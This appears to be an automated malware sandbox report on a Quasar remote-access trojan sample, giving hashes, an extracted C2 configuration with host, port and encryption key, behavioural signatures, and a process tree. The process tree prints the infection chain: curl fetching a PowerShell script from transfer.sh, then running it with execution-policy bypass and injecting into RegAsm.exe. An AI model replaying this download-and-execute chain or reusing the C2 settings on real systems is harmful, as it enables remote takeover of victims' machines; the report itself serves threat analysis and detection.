Analysis
-
max time kernel
133s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
17/01/2023, 08:11
Static task
static1
Behavioral task
behavioral1
Sample
{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
Resource
win10v2004-20221111-en
General
-
Target
{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
-
Size
547KB
-
MD5
b0ab211e83a23d58e1322e4d2d6f0a96
-
SHA1
d568fbcd41e30651cc80ba8a5e9eeab637a99f9e
-
SHA256
3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5
-
SHA512
4a54251fbf23fe3d0e96fcf8d3363e917921644a178387b619367338faa1884134639dd696d55a5a9f06cf167f128d599cc57fb62dba603afc4ebb287d22204d
-
SSDEEP
3072:SvGyYiSDnt1G5GWp1icKAArDZz4N9GhbkrNEk184:W4wp0yN90QEg
Malware Config
Extracted
quasar
1.4.0
Office04
ghcc.duckdns.org:4782
a9c03eb7-f3c1-4b9e-a4f7-1962d17a793b
-
encryption_key
B0326395AC2D48856CAE22978A087DF5DCF5816D
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Update
-
subdirectory
SubDir
Signatures
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/memory/3140-144-0x0000000000400000-0x0000000000484000-memory.dmp family_quasar behavioral2/memory/3140-145-0x000000000047E74E-mapping.dmp family_quasar -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 46 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 444 set thread context of 3140 444 powershell.exe 92 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 444 powershell.exe 444 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 444 powershell.exe Token: SeDebugPrivilege 3140 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3140 RegAsm.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2104 wrote to memory of 4604 2104 {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe 80 PID 2104 wrote to memory of 4604 2104 {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe 80 PID 4604 wrote to memory of 3340 4604 cmd.exe 82 PID 4604 wrote to memory of 3340 4604 cmd.exe 82 PID 3340 wrote to memory of 4280 3340 WScript.exe 83 PID 3340 wrote to memory of 4280 3340 WScript.exe 83 PID 4280 wrote to memory of 1548 4280 cmd.exe 85 PID 4280 wrote to memory of 1548 4280 cmd.exe 85 PID 1548 wrote to memory of 796 1548 cmd.exe 86 PID 1548 wrote to memory of 796 1548 cmd.exe 86 PID 3340 wrote to memory of 4264 3340 WScript.exe 87 PID 3340 wrote to memory of 4264 3340 WScript.exe 87 PID 4264 wrote to memory of 3424 4264 cmd.exe 89 PID 4264 wrote to memory of 3424 4264 cmd.exe 89 PID 3424 wrote to memory of 444 3424 cmd.exe 90 PID 3424 wrote to memory of 444 3424 cmd.exe 90 PID 444 wrote to memory of 3140 444 powershell.exe 92 PID 444 wrote to memory of 3140 444 powershell.exe 92 PID 444 wrote to memory of 3140 444 powershell.exe 92 PID 444 wrote to memory of 3140 444 powershell.exe 92 PID 444 wrote to memory of 3140 444 powershell.exe 92 PID 444 wrote to memory of 3140 444 powershell.exe 92 PID 444 wrote to memory of 3140 444 powershell.exe 92 PID 444 wrote to memory of 3140 444 powershell.exe 92
Processes
-
C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe"C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\SYSTEM32\cmd.execmd /c new.vbs2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\system32\cmd.execmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps15⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\system32\curl.execurl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps16⤵PID:796
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps15⤵
- Suspicious use of WriteProcessMemory
PID:3424 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps16⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:444 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3140
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
300.0MB
MD5f7e7099eea0cc25fc49d04cd53c573a1
SHA13abac9f3f93b0f87ef432d70c40e8ab865157770
SHA256b7f331e83a80b15cc4537324bde827ac9b2ecb990150db4d00d84ee2560cf5be
SHA512c19ddc5e41ed6d485f5df47996f34ff326a782e909bffaa8aa31a3f72fddb33cc7e3709e0cc44b2078668dc83297b42bb3157d6d000a9323ffca6303cd43f074
-
Filesize
5.1MB
MD5970aca768e68faa580f758a1a379686b
SHA16a93921485cbd83382eb5a47315b1f0a67bcf684
SHA2566c1e62385d660ca43e024d461154fbb4805e429cdf7850d19510d7f69533739e
SHA51266dd4c5b17978e68c8e0cd2bc4fd35ba5d519447ff34259ec77d11e4253cbfc9955a43915ed3c343f41dc04d97f4302ab6922a823b0e0da44e8893d29ec7cf0f